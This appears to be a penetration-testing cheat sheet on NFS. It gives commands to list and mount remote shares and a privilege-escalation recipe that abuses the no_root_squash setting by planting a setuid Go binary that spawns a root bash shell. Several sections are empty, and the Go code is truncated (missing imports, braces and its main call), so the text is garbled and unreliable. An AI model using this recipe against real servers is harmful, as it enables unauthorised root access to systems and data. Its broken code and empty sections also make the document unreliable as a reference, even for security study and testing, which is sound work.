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NFS (Network File System) allows a System to Share Directories and Files with others over a Network. It does this by Mounting all, or a portion of a file system on a server. There are no Mechanisms for Authentication.

:: NFS

How NFS Works?

First, the client will Request to Mount a Directory from a Remote Host on a local Directory. The Mount Service will then act to connect to the relevant Mount Daemon using RPC.

The Server checks if the user has Permission to Mount whatever directory has been requested. It will then return a file handle which uniquely identifies each File and Directory that is on the Server.

Show Contents

:: Show Mountable Folders
showmount -e <IP>
:: Show Files without Mounting
nfs-ls nfs://IP/DIRECTORY

:: Read Files without Mounting


:: Mounting the NFS Share
mkdir /mnt/MOUNT
mount -t nfs IP:/DIRECTORY /mnt/MOUNT -o nolock

Configuration Files

:: Location of the Configuration Files
:: Dangerous Settings


Only Possible If no_root_squash is Enabled

If no_root_squash is used, remote Root Users are able to change any file on the Shared File System.

:: Build 
:: This is going to Generate a Binary Named [setuid]
go build setuid.go

:: Copy the Binary to the NFS Share and Set the Permissions
cp setuid /NFS/SHARE

:: Permissions
sudo chown root:root setuid

sudo chmod +s setuid
:: Executing the Binary is going to Spawn a Shell with Root Permissions

package main

import (

func execute() {

out := exec.Command("/bin/bash", "-p")

out.Stdin = os.Stdin
out.Stdout = os.Stdout
out.Stderr = os.Stderr
_ = out.Run()

func main() {
if runtime.GOOS == "windows" {
fmt.Println("Can't Execute this on a Windows Machine.")
} else {
fmt.Println("Detected Linux Machine Executing.")